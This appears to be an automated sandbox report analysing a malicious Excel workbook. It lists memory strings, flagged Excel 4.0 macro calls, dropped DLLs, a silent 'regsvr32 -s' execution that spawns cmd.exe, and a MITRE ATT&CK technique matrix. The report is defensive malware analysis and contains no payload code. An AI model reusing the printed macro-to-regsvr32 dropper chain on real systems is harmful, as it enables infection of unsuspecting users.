    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: https://sectigo.com/CPS0
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://settings.outlook.com
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://staging.cortana.ai
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://tasks.office.com
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://wus2.contentsync.
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://www.odwebp.svc.ms

    System Summary:

    barindex
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: Total_order_data-V2434883.xlsbInitial sample: CALL
    Source: Total_order_data-V2434883.xlsbInitial sample: CALL
    Source: Total_order_data-V2434883.xlsbInitial sample: EXEC
    Office process drops PE fileShow sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dllJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\kdldyeff.dllJump to dropped file
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess Stats: CPU usage > 98%
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: classification engineClassification label: mal80.expl.evad.winXLSB@5/10@0/1
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{40B4E29A-81E2-4785-950C-FD213AB7F011} - OProcSessId.datJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exeJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Total_order_data-V2434883.xlsbInitial sample: OLE zip file path = xl/media/image1.png
    Source: Total_order_data-V2434883.xlsbInitial sample: OLE zip file path = xl/media/image2.png
    Source: Total_order_data-V2434883.xlsbInitial sample: OLE zip file path = xl/media/image3.png
    Source: Total_order_data-V2434883.xlsbInitial sample: OLE zip file path = xl/media/image4.png
    Source: Total_order_data-V2434883.xlsbInitial sample: OLE zip file path = xl/media/image5.png
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E02AF0 push dword ptr [edx+14h]; ret 2_2_00E02BFD
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dllJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\kdldyeff.dllJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\kdldyeff.dllJump to dropped file

    Boot Survival:

    barindex
    Drops PE files to the user root directoryShow sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\kdldyeff.dllJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dllJump to dropped file
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_01170456 mov eax, dword ptr fs:[00000030h]2_2_01170456
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_0117095E mov eax, dword ptr fs:[00000030h]2_2_0117095E
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exeJump to behavior
    Source: Yara matchFile source: app.xml, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting1DLL Side-Loading1Process Injection11Masquerading111OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution42Boot or Logon Initialization ScriptsDLL Side-Loading1Process Injection11LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Scripting1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol21Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRegsvr321LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi